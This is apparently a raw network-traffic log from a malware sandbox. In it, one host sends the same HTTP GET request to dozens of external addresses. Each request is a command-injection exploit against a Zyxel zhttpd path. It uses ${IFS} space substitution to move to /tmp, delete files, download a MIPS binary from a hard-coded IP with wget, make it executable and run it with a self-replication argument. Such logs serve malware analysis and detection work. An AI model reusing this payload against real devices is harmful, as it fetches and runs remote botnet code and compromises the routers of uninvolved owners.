                                                Jan 12, 2024 18:16:35.742933035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7523192.168.2.235979079.17.195.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742979050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7524192.168.2.2352720150.18.235.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743009090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7525192.168.2.2343274158.72.169.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743089914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7526192.168.2.2346052223.169.21.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743132114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7527192.168.2.2337290205.204.115.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743201017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7528192.168.2.2359090204.24.222.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743249893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7529192.168.2.2354220158.168.254.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743297100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7530192.168.2.2360260184.22.14.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743361950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7531192.168.2.235031414.22.2.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743419886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7532192.168.2.2351180212.92.24.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743463993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7533192.168.2.2359230195.221.2.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743510008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7534192.168.2.2335744174.56.26.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743571043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7535192.168.2.234247261.231.142.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743614912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7536192.168.2.234939671.31.75.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743658066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7537192.168.2.2345946139.77.77.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743695021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7538192.168.2.2339646188.197.73.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743750095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7539192.168.2.235582483.33.98.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743779898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7540192.168.2.235476212.105.111.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743840933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7541192.168.2.2355598202.124.103.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743906021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7542192.168.2.2347200219.246.22.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.743963957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7543192.168.2.2335804195.6.16.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744014978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7544192.168.2.2357324135.194.85.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744081974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7545192.168.2.2358730178.88.219.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744121075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7546192.168.2.2350700153.176.167.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744158030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7547192.168.2.235294664.153.158.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744206905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7548192.168.2.2354740116.65.14.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744240999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7549192.168.2.2351092152.88.85.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744288921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7550192.168.2.236010435.39.199.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744352102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7551192.168.2.2339184197.60.76.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744388103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7552192.168.2.2337432195.96.226.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744421959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7553192.168.2.2358414109.245.205.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744476080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7554192.168.2.2336570177.253.17.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744525909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7555192.168.2.2357306201.69.69.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744561911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7556192.168.2.2334248152.89.181.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744590998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7557192.168.2.233383634.140.122.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744654894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7558192.168.2.2348482131.87.254.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744700909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7559192.168.2.235137018.140.5.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744750977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7560192.168.2.235161038.108.134.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744807959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7561192.168.2.2338116102.104.99.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744837046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7562192.168.2.234884876.84.52.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744879961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7563192.168.2.2358422122.120.77.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744940042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7564192.168.2.235148220.182.138.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.744986057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7565192.168.2.233907270.146.77.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745055914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7566192.168.2.2359050223.130.160.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745094061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7567192.168.2.2338112178.101.142.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745172977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7568192.168.2.2340260129.47.239.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745204926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7569192.168.2.2360842209.45.9.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745260954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7570192.168.2.2346008205.167.208.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745315075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7571192.168.2.234295435.76.233.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745378017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7572192.168.2.2353572213.210.238.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745443106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7573192.168.2.234006263.175.228.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745469093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7574192.168.2.234436661.250.37.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745532036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7575192.168.2.2338462195.204.57.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745580912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7576192.168.2.2350862101.168.6.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745596886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7577192.168.2.2334952122.238.166.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745639086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7578192.168.2.2342434150.22.45.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745712042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7579192.168.2.2349424178.255.224.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745762110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7580192.168.2.2350172213.169.50.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745810032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7581192.168.2.2342990122.222.173.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745878935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7582192.168.2.234954299.148.154.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745928049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7583192.168.2.235557244.232.25.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.745987892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7584192.168.2.2354950186.249.61.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746020079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7585192.168.2.2347546158.114.239.18443
                                                TimestampBytes transferredDirectionData
